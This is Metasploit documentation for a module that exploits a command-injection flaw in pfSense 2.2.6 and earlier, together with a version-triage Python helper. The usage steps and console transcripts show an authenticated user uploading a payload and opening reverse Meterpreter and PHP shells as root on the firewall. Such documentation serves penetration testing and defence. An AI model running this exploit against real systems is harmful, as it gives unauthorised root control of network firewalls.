metasploit-gs/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md
2018-01-01 17:30:43 -06:00

## Description

This module exploits a vulnerability in pfSense 2.2.6 and earlier that allows an authenticated user to execute arbitrary operating system commands as root.

## Vulnerable Application

This module has been tested successfully on 2.2.6-RELEASE, 2.2.5-RELEASE, and 2.1.3-RELEASE.
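The affected range above ("2.2.6 and before") is easy to get wrong when triaging an inventory of firewalls that report strings such as `2.2.6-RELEASE` or `2.1.3-RELEASE`. The following helper is an added example and is not part of the module or the pfSense project; it parses those version strings, treats a missing patch component as `.0` (an assumption), and flags anything at or below 2.2.6 as affected. The `extract_detected_version` function reads the version out of the `[*] Detected pfSense ...` line format shown in the scenarios below.

```python
import re
from typing import Dict, Iterable, Optional, Tuple

# Highest affected version stated in the module description: "2.2.6 and before".
LAST_AFFECTED = (2, 2, 6)

# Matches "2.2.6-RELEASE", "2.2.6", "2.3", and release strings with extra
# suffixes such as "-RELEASE-p1". The suffix itself is ignored for ordering.
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9.-]+))?\s*$")


def parse_pfsense_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Parse a pfSense version string into a (major, minor, patch) tuple.

    A missing patch component is treated as 0 (assumption). Returns None
    when the string does not look like a version at all.
    """
    m = _VERSION_RE.match(text)
    if not m:
        return None
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)
    return (major, minor, patch)


def is_affected(version_text: str) -> Optional[bool]:
    """True if the version is 2.2.6 or earlier, False if newer, None if unparseable."""
    version = parse_pfsense_version(version_text)
    if version is None:
        return None
    return version <= LAST_AFFECTED


def extract_detected_version(line: str) -> Optional[str]:
    """Pull the version token out of a module log line of the form
    '[*] Detected pfSense 2.2.6-RELEASE, uploading ...' as shown on this page."""
    m = re.search(r"Detected pfSense (\S+?),", line)
    return m.group(1) if m else None


def triage(version_texts: Iterable[str]) -> Dict[str, Optional[bool]]:
    """Map each reported version string to its affected status."""
    return {v: is_affected(v) for v in version_texts}


if __name__ == "__main__":
    # Constructed sample inventory; the first two strings are the ones the page tests.
    sample = ["2.2.6-RELEASE", "2.1.3-RELEASE", "2.3", "2.2.7-RELEASE", "unknown"]
    for version, status in triage(sample).items():
        label = {True: "AFFECTED", False: "not affected", None: "unparseable"}[status]
        print(f"{version:16s} {label}")
```

Anything that returns `None` should be checked by hand rather than silently treated as safe; an unparseable banner is a reporting problem, not evidence of a patched host.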

Installers:

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/http/pfsense_graph_injection_exec`
  3. Do: `set RHOST [IP]`
  4. Do: `set USERNAME [username]`
  5. Do: `set PASSWORD [password]`
  6. Do: `set LHOST [IP]`
  7. Do: `exploit`

## Scenarios

### pfSense Community Edition 2.2.6-RELEASE

```
msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600

meterpreter > sysinfo
Computer    : pfSense.localdomain
OS          : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015     root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid
Server username: root (0)
meterpreter >
```

### pfSense Community Edition 2.1.3-RELEASE

```
msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
uname -a

FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May  1 16:19:14 EDT 2014     root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8  amd64
```